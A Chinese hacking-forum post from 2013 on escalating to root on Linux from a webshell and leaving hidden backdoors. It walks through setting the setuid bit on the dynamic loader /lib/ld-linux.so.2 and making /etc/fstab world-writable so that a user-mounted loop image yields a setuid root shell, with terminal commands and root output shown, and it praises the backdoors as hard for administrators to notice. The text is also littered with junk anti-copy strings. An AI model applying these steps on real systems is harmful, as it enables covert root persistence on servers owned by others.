中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
$ t- h% I0 a6 r$ `0 E" B" ~+ m" z
: i7 }2 u$ V* p6 [5 m) d[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
+ h; l0 `  v4 E* O+ qlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
" P( J$ ^- T3 qlrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究" H: ~* k8 H% V5 j' f. p# Y
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究7 b3 u* Y3 r7 q  i" V1 h
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
* w: j4 R! \9 G; O$ o3 |-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
2 Q( a$ q/ n5 elrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究3 y! r) T! V' f9 B
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究. I' F8 C, Y% Z; c( w
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
* Z/ Z* A, E( l+ }+ F6 X: X2 O- i! N% s* v+ ^$ Z+ x6 W$ b
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究2 c8 Z/ q3 }( @$ t* T
& n) P( ~' N$ ]$ R/ w8 Z2 u9 u
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
9 s, F. |) V+ f  u, x5 Fxiaoyu2ezX-BUG-关注前沿信息安全技术研究
5 W9 @% F/ h. w$ v1 C* g; Y[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究5 m' p# ^( e9 a+ M
root2ezX-BUG-关注前沿信息安全技术研究
" j# @0 t' _0 t) q0 G[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究- l- U; f- ^7 @
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究5 E9 D% y  j1 c( q! J

- B4 T! R9 c5 k) a( W- B0 w* |方法二:2ezX-BUG-关注前沿信息安全技术研究/ b' X& r' e2 s0 R
* R+ ^) j- W/ o9 M" J# }* j
看过程:2ezX-BUG-关注前沿信息安全技术研究
8 Q2 t  {0 q/ h; @  m: B5 W+ J
" H" ~. U# }' ]3 j7 s4 d# d# j1 E[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
( n3 L( x# i. C' m, e. a- s[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究# O& S1 ]7 v9 n% H6 d
" C% a% L  D  h1 d% }; G
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
% f: U- A- a; g" J' [% g0 W# n) t9 }- e7 x) S2 s& W
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
$ n( |5 h& c& T( N-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究- J) l, \% G5 \) c# N
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
+ W$ Z: E" v( u7 s; k4 N+ z* o# r2 @1 {$ \1 x" ]
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
$ W  _! R7 d. J6 P, n% u; g8 f- s% {  G: D/ R
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究; {7 m6 s! S: z% {5 s
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究( E" }! k; [' f' f) Z) A
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
$ z# [3 W4 G, H; r2 P6 q[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
# Z: V* C. t# l. l1 O5 V[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究$ k4 T5 F) @, Y, K! ]
total 182ezX-BUG-关注前沿信息安全技术研究: b4 S, ^9 W* Y  k; m
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
3 I0 O0 f8 F5 L' d8 ]8 \/ k-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究9 S; D0 W3 e: k9 Y
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究  e) Y' d: ~& p* A+ }
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究' s- @9 R& D7 F, I2 W6 s6 H
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
% f4 Q: h2 q% n  O7 G$ }test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究! [0 ]0 F$ b6 P+ n* n4 b
- D' E0 Y! z  V
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究" B$ C- c9 B: w/ c. e
2ezX-BUG-关注前沿信息安全技术研究
: n. t" c5 ?6 K3 ^. e- i+ [( R) N- ^$ q5 u6 Z+ V
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2